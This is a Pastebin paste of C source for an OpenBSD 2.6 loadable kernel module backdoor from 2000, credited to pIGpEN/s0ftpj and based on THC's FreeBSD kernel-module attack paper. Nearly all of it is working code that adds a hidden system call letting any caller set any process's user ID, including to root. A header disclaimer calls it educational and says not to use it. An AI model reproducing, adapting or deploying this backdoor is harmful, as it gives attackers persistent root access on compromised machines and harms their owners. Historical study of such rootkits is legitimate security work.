Advertisement
FlyFar

thc_back.c

May 17th, 2024
858
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.12 KB | Cybersecurity | 0 0
  1. /*
  2.  * Name: OpenBSD backdoor
  3.  * Date: Thu Jun 01 14:46:37 2000
  4.  * Author: pIGpEN [ pigpen@s0ftpj.org, deadhead@sikurezza.org ]
  5.  *
  6.  * idea & credits go to pragmatic / THC
  7.  *               "Attacking FreeBSD with Kernel Modules"
  8.  *
  9.  * OpenBSD porting by   pIGpEN / s0ftpj
  10.  *
  11.  *
  12.  * SoftProject Digital Security for Y2K (www.s0ftpj.org)
  13.  * Sikurezza.org Italian Security MailingList (www.sikurezza.org)
  14.  *
  15.  * COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by
  16.  * Poul-Henning Kamp <phk@FreeBSD.ORG> but you can give me in return a coffee.
  17.  *
  18.  * Tested on: OpenBSD 2.6 FRACTAL#1 i386
  19.  *
  20.  * This is a simple but useful backdoor for OpenBSD based on a FreeBSD lkm
  21.  * by pragmatic/THC you can read his paper: "Attacking FreeBSD with Kernel
  22.  * Modules" to understand how to implement it also on a OpenBSD kernel...    
  23.  *
  24.  * Greetings to: bozo(iKX), koba (sikurezza.org), pragmatic (THC) for his
  25.  *       work
  26.  *
  27.  * Consider this an example of lkm... don't use it!
  28.  * I didn't cover the module because it must be considered only for
  29.  * educational purposes
  30.  */
  31.  
  32.  
  33. #include <sys/param.h>
  34. #include <sys/systm.h>
  35. #include <sys/syscall.h>
  36. #include <sys/mount.h>
  37. #include <sys/conf.h>
  38. #include <sys/syscallargs.h>
  39. #include <sys/exec.h>
  40. #include <sys/lkm.h>
  41. #include <sys/file.h>
  42. #include <sys/filedesc.h>
  43. #include <sys/errno.h>
  44. #include <sys/proc.h>
  45.  
  46. #define OFFSET  210
  47.  
  48. struct you_make_me_real_args {
  49.     syscallarg(int) p_pid;  /* process to make with p_real uid */
  50.     syscallarg(int) p_real; /* p_real uid */
  51. };
  52.                          
  53. static int
  54. you_make_me_real (struct proc *p, void *v, register_t *retval)
  55. {  
  56.     struct you_make_me_real_args *uap = v;
  57.     struct proc *pr;
  58.  
  59.     if((pr = pfind(SCARG(uap, p_pid))) == NULL)
  60.         return (ESRCH);
  61.    
  62.     pr->p_cred->pc_ucred->cr_uid = SCARG(uap, p_real);
  63.    
  64.     return 0;
  65. }
  66.  
  67. static struct sysent you_make_me_real_sysent = {
  68.     2,
  69.     sizeof(struct you_make_me_real_args),
  70.     you_make_me_real
  71. };
  72.  
  73. MOD_SYSCALL( "thc_bck", OFFSET, &you_make_me_real_sysent);
  74.  
  75. int
  76. thc_bck (struct lkm_table *lkmtp, int cmd, int ver)
  77. {
  78.     DISPATCH(lkmtp, cmd, ver, lkm_nofunc, lkm_nofunc, lkm_nofunc)
  79. }
  80.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement